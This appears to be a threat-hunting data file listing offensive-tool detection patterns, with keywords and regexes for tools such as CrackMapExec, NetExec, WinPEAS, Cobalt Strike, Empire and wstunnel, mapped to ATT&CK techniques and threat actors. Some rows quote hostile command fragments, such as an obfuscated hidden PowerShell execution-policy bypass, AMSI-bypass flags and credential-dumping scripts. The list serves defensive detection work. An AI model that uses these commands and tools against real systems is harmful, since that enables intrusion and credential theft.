"* Windows-Passwords.ps1*",".{0,1000}\sWindows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","3723"
"* -wINdOwstYL Hi -nop -eXecU BYpAss -COm  *",".{0,1000}\s\-wINdOwstYL\sHi\s\-nop\s\-eXecU\sBYpAss\s\-COm\s\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","3724"
"* WINHELLO2hashcat.py*",".{0,1000}\sWINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","3725"
"* win-key-killer.ps1*",".{0,1000}\swin\-key\-killer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3726"
"* WinPEAS - Windows local Privilege Escalation Awesome Script*",".{0,1000}\sWinPEAS\s\-\sWindows\slocal\sPrivilege\sEscalation\sAwesome\sScript.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","3727"
"* -winPEAS *",".{0,1000}\s\-winPEAS\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3728"
"* winPEAS.ps1*",".{0,1000}\swinPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","3729"
"* WinPirate.bat*",".{0,1000}\sWinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","3730"
"* winpwnage.py*",".{0,1000}\swinpwnage\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","3731"
"* winrm * -u * -p * --laps*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-laps.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3732"
"* winrm * -u * -p * -X whoami*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-X\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3733"
"* winrm.py*",".{0,1000}\swinrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3734"
"* wiRAT\Minner.exe*",".{0,1000}\swiRAT\\Minner\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3735"
"* --wldp-bypass=*",".{0,1000}\s\-\-wldp\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","3739"
"* --wmi *SELECT *",".{0,1000}\s\-\-wmi\s.{0,1000}SELECT\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3740"
"* wmi_exec.exe*",".{0,1000}\swmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","3741"
"* wmiexec.py -k -no-pass *",".{0,1000}\swmiexec\.py\s\-k\s\-no\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3742"
"* wmiexec.py*",".{0,1000}\swmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3743"
"* WMIHACKER.vbs*",".{0,1000}\sWMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","3744"
"* wmihacker_0.4.vbe*",".{0,1000}\swmihacker_0\.4\.vbe.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","3745"
"* WMIHACKER_0.6.vbs*",".{0,1000}\sWMIHACKER_0\.6\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","3746"
"* --wmi-namespace 'root\cimv2'*",".{0,1000}\s\-\-wmi\-namespace\s\'root\\cimv2\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3747"
"* wmirun=true dllpath=*.dll* computername=*",".{0,1000}\swmirun\=true\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","3748"
"* -wordlist * -spawnto *",".{0,1000}\s\-wordlist\s.{0,1000}\s\-spawnto\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","3749"
"* --wordlist=*.lst*",".{0,1000}\s\-\-wordlist\=.{0,1000}\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3750"
"* -word-list-path * -file-extensions *",".{0,1000}\s\-word\-list\-path\s.{0,1000}\s\-file\-extensions\s.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3751"
"* -word-list-path tomatch.txt*",".{0,1000}\s\-word\-list\-path\stomatch\.txt.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3752"
"* -WorkingHours *",".{0,1000}\s\-WorkingHours\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3753"
"* --wpad --lm --ProxyAuth --disable-ess**",".{0,1000}\s\-\-wpad\s\-\-lm\s\-\-ProxyAuth\s\-\-disable\-ess.{0,1000}.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3754"
"* wraith.py*",".{0,1000}\swraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3755"
"* wraith-server.py*",".{0,1000}\swraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3756"
"* wraith-server_v*.py*",".{0,1000}\swraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3757"
"* WriteToLsass*",".{0,1000}\sWriteToLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","3758"
"* ws://[::]:*",".{0,1000}\sws\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3759"
"* wsdd-discover.nse*",".{0,1000}\swsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3760"
"* ws-dirs.txt*",".{0,1000}\sws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3761"
"* ws-files.txt*",".{0,1000}\sws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3762"
"* WSManWinRM.js *",".{0,1000}\sWSManWinRM\.js\s.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","3763"
"* WSManWinRM.ps1*",".{0,1000}\sWSManWinRM\.ps1.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","3764"
"* WSPCoerce.cs*",".{0,1000}\sWSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","3765"
"* wss://0.0.0.0:*",".{0,1000}\swss\:\/\/0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3766"
"* wstunnel.exe*",".{0,1000}\swstunnel\.exe.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3767"
"* -X '$PSVersionTable'  --amsi-bypass *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3768"
"* -X '$PSVersionTable' *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3769"
"* -x * --exec-method *",".{0,1000}\s\-x\s.{0,1000}\s\-\-exec\-method\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3770"
"* -X '[System.Environment]::Is64BitProcess'*",".{0,1000}\s\-X\s\'\[System\.Environment\]\:\:Is64BitProcess\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3771"
"* -X FUZZ http*",".{0,1000}\s\-X\sFUZZ\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3772"
"* -X whoami --obfs*",".{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3773"
